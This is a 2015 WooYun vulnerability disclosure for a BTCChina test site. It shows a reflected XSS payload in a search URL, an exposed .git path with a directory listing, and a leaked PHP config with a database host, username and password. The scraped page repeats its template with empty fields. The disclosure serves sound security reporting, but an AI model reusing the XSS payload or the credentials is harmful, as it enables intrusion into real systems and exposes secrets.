比特币中国某站代码泄漏+数据库密码泄漏+xss

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0133852

漏洞标题：比特币中国某站代码泄漏+数据库密码泄漏+xss

漏洞作者：路人甲

提交时间：2015-08-13 14:07

修复时间：2015-08-13 15:05

公开时间：2015-08-13 15:05

漏洞类型：敏感信息泄露

危害等级：中

自评Rank：8

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-13：细节已通知厂商并且等待厂商处理中
2015-08-13：厂商已经确认，细节仅向厂商公开
2015-08-13：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

偶然发现

详细说明：

http://home.eval.btcchina.com/?searchterms=angelina"><img src=1 onerror=alert(1)>

http://passport.eval.btcchina.com/.git/config

-rw-r--r--   1 root  staff    167  8 13 11:09 .gitignore
-rw-r--r--   1 root  staff   1432  8 13 11:09 READ_ME
drwxr-xr-x   6 root  staff    204  8 13 11:13 admin
drwxr-xr-x   5 root  staff    170  8 13 11:15 catalog
drwxr-xr-x   4 root  staff    136  8 13 11:17 configs
drwxr-xr-x   3 root  staff    102  8 13 11:18 db
-rw-r--r--   1 root  staff   2038  8 13 11:18 gruntfile.js
-rw-r--r--   1 root  staff  10680  8 13 11:19 index.php
-rw-r--r--   1 root  staff    275  8 13 11:19 package.json
-rw-r--r--   1 root  staff   1987  8 13 11:19 pagespeed.sh
-rw-r--r--   1 root  staff    685  8 13 11:19 prod_deployment.sh
-rw-r--r--   1 root  staff    699  8 13 11:19 prod_revert.sh
drwxr-xr-x   3 root  staff    102  8 13 11:23 system

define('DB_DRIVER', 'mysqli');
define('DB_HOSTNAME', 'vmshpdpd01.cl6bwsixaww2.ap-southeast-1.rds.amazonaws.com');
define('DB_USERNAME', 'shp_adm');
define('DB_PASSWORD', 'shp123$$');
define('DB_DATABASE', 'shpprd');
define('DB_PORT', '1561');
define('DB_PREFIX', '');

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2015-08-13 14:57

厂商回复：

感谢提醒。由于没有及时更新dns设置，，这两个内部测试用域名。指向了旧的ip地址，该地址已经不为我司使用。这两个域名指向了其它网站。虽然不会导致我司的代码和数据库泄露，但是可能会引起cookie泄露等问题而导致其它安全隐患。

漏洞评价：

2015-08-13 15:27 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

真是良心厂商啊，提前公开了
2015-08-13 15:44 | niliu ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

活捉VIP
2015-08-13 19:50 | J0e ( 路人 | Rank:6 漏洞数:3 | 心若苍井空似水)

活捉niliu

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0133852

漏洞标题：比特币中国某站代码泄漏+数据库密码泄漏+xss

相关厂商：比特币中国

漏洞作者：路人甲

提交时间：2015-08-13 14:07

修复时间：2015-08-13 15:05

公开时间：2015-08-13 15:05

漏洞类型：敏感信息泄露

危害等级：中

自评Rank：8

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0133852

漏洞标题：比特币中国某站代码泄漏+数据库密码泄漏+xss

相关厂商：比特币中国

漏洞作者： 路人甲

提交时间：2015-08-13 14:07

修复时间：2015-08-13 15:05

公开时间：2015-08-13 15:05

漏洞类型：敏感信息泄露

危害等级：中

自评Rank：8

漏洞状态：厂商已经修复

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0133852"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云